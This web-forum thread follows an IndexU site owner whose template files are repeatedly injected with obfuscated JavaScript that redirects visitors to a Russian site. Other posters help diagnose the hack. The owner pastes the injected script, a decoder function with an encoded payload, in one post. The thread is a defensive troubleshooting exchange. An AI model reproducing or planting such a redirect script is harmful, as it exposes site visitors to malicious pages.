Virus !!!

[Voyageur]

Hello,

I have virus or spyware in my IndexU website, when i access admin area the browser refresh to a russian url !!!!!

Anyone has this problem ?

[Warz]

It's probably someone who managed to insert a virus code... Could be server security issues also... Try to find the code and remove it.

[richrf]

Is this the result of an SQL injection security leak? What version are you using? Thanks.

Rich

[Bruceper]

Send me your ftp login and password as well as your indexu login and password.

I would also ask for your cpanel login and password so I can check logs and see how/what was done.

I'll also want your IP address for when i'm checking the logs.

You can send it to me via PM or to support [at] nicecoder.com

For now just leave the site alone, every action you take causes the logs to fill up and may push off the info we want to look at.

[Voyageur]

hi Bruceper,

I find this code in the footer and header :

<script language=JavaScript>function ehban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,59, 51,6,33,44,30,4,28,16,0,0,0,0,0,0,42,57,21,2,36,54 ,56,25,3,8,55,52,18,17,46,53,34,61,37,40,47,20,58, 38,26,29,49,0,0,0,0,22,0,13,27,60,24,35,39,45,7,5, 0,32,10,48,19,15,50,1,9,23,31,12,11,43,14,62,41);f or(j=Math.ceil(l/b);j>0;j----REMOVED----EFOxNIDapGK6suDtNIWUpGEsPrR8L8po2z2re8ElNSW7TYDaEd PHbgO6PGe8E5WBCzWL@FOspGe_JSO31gKKPGeM6QP_pFRY3agd EdDsTIWsEzRU3aKnTu2vf8p9vgJr0ufxfup6vgJbfge9EGeMLc pv28EMprD63Ge7eupvfgPaCdR8LcEYCzPr_rWjxcR_6rfbt8Z_ HAfvPrR865J9H')</script>

I remove it from footer template but i find another in the admin template footer, my admin panel refresh to http://www.REMOVED

Maybe this come from my computer when i edit files ? cause i have some spywares but i have Outpost, it stop them.

you still need informatins for access my website ? i don't have C-Panel, only PHP Myadmin.

Thanks for help

[Bruceper]

I removed some info from your post, no real need to have it public.

Looks like you've definately been hacked, but the question is how. It appears to be typical "wannabe hacker loser" javascript injection.

Yes a trojan could have sniffed your password from your home computer easily.

phpmyadmin access won't help, I want to see logs that will show where/when/how the user logged in. That can only be done typically via a control panel or from root.

Do you have an access_log file? or any other log file for apache or your ftp daemon?

[dePaulus]

replace the document.write() call with an alert() and run it in your address bar to have the deciphered output alerted for you .

[dody]

I think it was because the hacker is trying to insert js code when filling the form.

Indexu has ability to check this kind of hacking and will remove the js code. But it seem the js code may unusual and indexu failed to remove it completely. But since your data is safe, i think the hacker is failed, but still cause a damage to your website.

Now the problem is to find where the js code and after this, we need to remove it. A quick look will be 'view source'.

[Bruceper]

The poster still has not provided logs or a login or even a URL to confirm any of this.

[Voyageur]

Hi,

I'm coming back !

In fact it's not a problem from IndexU, i have virus on all my websites, always in the template files, google has put a warning in the search results "this site can harm your computer".

I removed the hack code from my templates files, all seems working well now.

I noticed what Dodi said in a post here, when i'm on IndexU control panel i see often someone trying to add a site with an amazing url like "http://www.example.ru/?image.gif", an invalid url and always russian url, the hacked pages refresh a russin url too.

I think the virus come from my computer. Not a problem of IndexU !!

[Voyageur]

Hi,

The virus are coming back on all my websites !!

Anyone know a good web antivirus ? i think the virus are at my host.

Thanks

[Bruceper]

There isn't one. If they are coming back it's because someone is placing them there.

[dody]

You can check the ip, are they from your ip? If no, someone else doing this, not from your pc.

[Voyageur]

I think there's a trojan at my web hosting account.

Files at my computer are clean, when i see problems with my web site i go to my ftp account and find javascript code in my templates files (an all my web sites), i replace templates files and it's ok, after some hours the javascript code come back in my templates files, that's why i believe that's the virus is not in my computer but in my hosting account.

I have an idea : lock templates files (no write permissions), maybe it resolves the problem.

It's must be something i have downloaded i think !!!

[Bruceper]

It's going to be a script running as root that is injecting code. Talk to your host about this.